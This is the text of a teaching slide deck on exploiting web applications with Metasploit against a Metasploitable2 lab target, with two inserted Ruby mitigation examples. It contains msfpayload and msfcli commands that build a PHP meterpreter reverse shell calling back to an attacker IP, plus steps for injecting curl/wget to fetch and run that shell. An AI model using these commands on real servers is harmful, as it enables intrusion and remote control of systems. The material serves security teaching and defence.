Introduction to Metasploit:
Exploiting Web Applications
Dennis Maldonado @DennisMald
Dennis Maldonado
Application Security Specialist WhiteHat Security
Full-Time Student University of Houston – Main Campus ▪ Computer Information Systems Major
Twitter @DennisMald
Website / Blog KernelMeltdown.org
Tools
Kali Linux – Our attacker machine
Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.
Metasploitable2 – Victim Web Server
Topic of the day
Exploiting the backend server through a web application.
What’s the problem?
Reasons why hackers want to compromise the server:
▪ Run attacks against the internal network
▪ Use the server as a bot
▪ Install backdoors onto the server
▪ Reveal sensitive files/passwords
▪ Execute any local file
▪ Execute remote files
▪ and more…
What’s the problem?
Vulnerabilities that are dangerous against a server:
▪ Directory Traversal
▪ Local File Inclusion
▪ Remote File Inclusion
▪ Remote Code Execution
▪ SQL Injection
▪ Command Injection
Directory Traversal
http://website.com/?page=index.php
Local File Inclusion
http://website.com/?page=index.php
Remote File Inclusion
http://website.com/?page=index.php
Remote Code Execution
http://website.com/
SQL Injection
http://website.com/user.php?id=1&Submit=Submit#
Command Injection
Metasploit Basics
The Metasploit Project
Metasploit is an open-source framework used for:
▪ Security development and testing
▪ Information gathering and fingerprinting
▪ Exploitation/Penetration testing
▪ Payload generation and encoding
▪ Fuzzing
▪ And much more…
Metasploit Interfaces
Command Line Interfaces
▪ msfconsole
▪ msfcli
GUI Interfaces
▪ Metasploit Community Edition
▪ Armitage
Metasploit Modules
Exploit – Exploitation/Proof-of-Concept code
▪ Ruby on Rails exploit
▪ PHP-CGI exploit
Auxiliary – Misc. modules for multiple purposes
▪ Scanners
▪ DDoS tools
▪ Fingerprinting
▪ Clients
Payloads – Code to be executed on the exploited system
▪ System Shells
▪ Meterpreter Shells
Post – Modules for post-exploitation tasks
▪ Persistence
▪ Password Stealing
▪ Pivoting
Exploits
Active Exploits
▪ Actively exploit a host.
▪ Ex: Ruby on Rails XML exploit
Passive Exploits
▪ Waits for incoming hosts, then exploits them.
▪ Ex: Java 0-days
Exploits contain payloads
Payloads
Inline (Non-Staged)
▪ Payload containing the exploit and shell code
▪ Stable
▪ Large size
Staged
▪ Exploits victim, establishes connection with attacker, pulls down the payload
Meterpreter
▪ Advanced, dynamic payload
▪ Extended over the network
▪ Extensible through modules and plugins
Payloads continued
Types of connections
Bind
▪ Local server gets started on victim machine
▪ Attacker connects to victim
▪ windows/x64/shell/bind_tcp
Reverse
▪ Local server gets started on attacker machine
▪ Victim connects to attacker
▪ windows/x64/shell/reverse_tcp
Vulnerabilities and Exploit Examples
PHP-CGI Argument Injection
CVE-2012-1823
DoS attack
▪ -T 10000
Source code disclosure
▪ -s argument
Remote Code Execution
▪ -d argument
Ruby on Rails XML Parameter Parsing Vulnerability
CVE-2013-0156
Easy to find, easy to exploit, critical vulnerability.
Requires just one POST request containing specially crafted XML data.
Send commands through YAML objects
Unrestricted File Upload
The upload functionality allows for any file type to be uploaded.
1. Upload server-side code and check if it executes
▪ PHP = <?php echo "Hello World!"; ?>
▪ ASP = <% Response.Write "Hello World!" %>
▪ JSP = <%= new java.util.Date().toString() %>
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Upload the shell and execute it
Command Injection
Allows an attacker to execute system-level commands.
1. Attempt a safe command
▪ echo test
▪ uname -a
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Inject curl or wget commands to download the shell onto the victim machine
5. Chmod if necessary and execute
Commands used (Note: IP addresses and ports may be different)
msfpayload php/meterpreter/reverse_tcp O
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php
# Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.
==================================
msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
Mitigations and Closing
Mitigations
Keep software up to date!
▪ PHP: 5.4.3, 5.3.13
▪ Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15
Use whitelisting for file upload extensions
▪ Watch for extensions and content-types
▪ Don't let upload directory be executable
▪ Rename files if possible
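The upload checks on this slide (extension whitelist, content-type agreement with the bytes, renaming, a non-executable store), as an added Ruby example that is not from the talk; the allowed image types, their magic bytes and the on-disk layout are assumptions made for this demo.

```ruby
require 'securerandom'

# Added example, not from the talk. The allowed types and their magic bytes are
# assumptions for this demo; the allowlist is the whole policy, anything absent is rejected.
ALLOWED_TYPES = {
  'png' => { content_type: 'image/png',  magic: ["\x89PNG\r\n\x1a\n".b] },
  'jpg' => { content_type: 'image/jpeg', magic: ["\xFF\xD8\xFF".b] },
  'gif' => { content_type: 'image/gif',  magic: ['GIF87a'.b, 'GIF89a'.b] },
}.freeze

class UploadRejected < StandardError; end

# Returns the extension the file will be stored under, or raises UploadRejected.
# Only the final extension is consulted (so name.php.png is judged as png), and the
# client's filename and Content-Type are treated as claims the bytes must back up.
def validate_upload(original_name, content_type, data)
  ext = File.extname(original_name).delete_prefix('.').downcase
  rule = ALLOWED_TYPES[ext]
  raise UploadRejected, "extension not allowed: #{ext.inspect}" unless rule
  unless content_type == rule[:content_type]
    raise UploadRejected, "content-type #{content_type} does not match .#{ext}"
  end
  unless rule[:magic].any? { |m| data.b.start_with?(m) }
    raise UploadRejected, "file content is not a valid #{ext}"
  end
  ext
end

# Writes the upload under a random name the client never gets to choose, with mode
# 0600 (no execute bit) inside a 0700 directory, and returns the stored path.
def store_upload(upload_dir, original_name, content_type, data)
  ext = validate_upload(original_name, content_type, data)
  Dir.mkdir(upload_dir, 0o700) unless Dir.exist?(upload_dir)
  path = File.join(upload_dir, "#{SecureRandom.hex(16)}.#{ext}")
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0o600) { |f| f.write(data) }
  path
end
```

Keeping the web server from handing files in the upload directory to a script interpreter is server configuration and sits outside this code.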
Don't pass user input as a system command!
▪ Use library calls when possible
▪ Sanitize input
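The command-injection mitigation above (validate the input, never build a shell string, prefer library calls), as an added Ruby example that is not from the talk; the ping feature, the hostname grammar and the pages directory are assumptions made for this demo.

```ruby
require 'open3'

# Added example, not from the talk; the hostname grammar and the pages directory
# are assumptions for this demo.
HOSTNAME_RE = /\A[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*\z/i

class BadInput < StandardError; end

# Hardened form of a "ping the host the user typed" feature. Two layers: the input
# must match a strict hostname grammar, and the command is an argv array, so Ruby
# executes the binary directly and never hands a string to /bin/sh. The vulnerable
# shape is a single interpolated string such as `ping -c 1 #{host}`, which the
# shell parses for ;, |, $(...) and friends.
def ping_argv(host)
  raise BadInput, "not a hostname: #{host.inspect}" unless host.match?(HOSTNAME_RE)
  ['ping', '-c', '1', host]
end

def run_ping(host)
  out, status = Open3.capture2e(*ping_argv(host))
  [out, status.success?]
end

# "Use library calls when possible": reading a page with File.read instead of
# `cat #{page}` removes the shell entirely, but the path still has to be confined
# to the intended directory, or the same ?page= parameter becomes the directory
# traversal case from the earlier slides.
def read_page(pages_dir, name)
  base = File.expand_path(pages_dir)
  path = File.expand_path(name, base)
  raise BadInput, "path escapes #{base}" unless path.start_with?(base + File::SEPARATOR)
  File.read(path)
end
```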
Questions? Comments?
Sources
BackTrack-Linux http://www.kali.org/
The Metasploit Project http://www.metasploit.com/
Metasploit Unleashed http://www.offensive-security.com/metasploit-unleashed/
PHP-CGI Advisory http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
Ruby on Rails Exploitation https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156
Damn Vulnerable Web Application (DVWA) http://www.dvwa.co.uk/
Metasploitable 2 http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web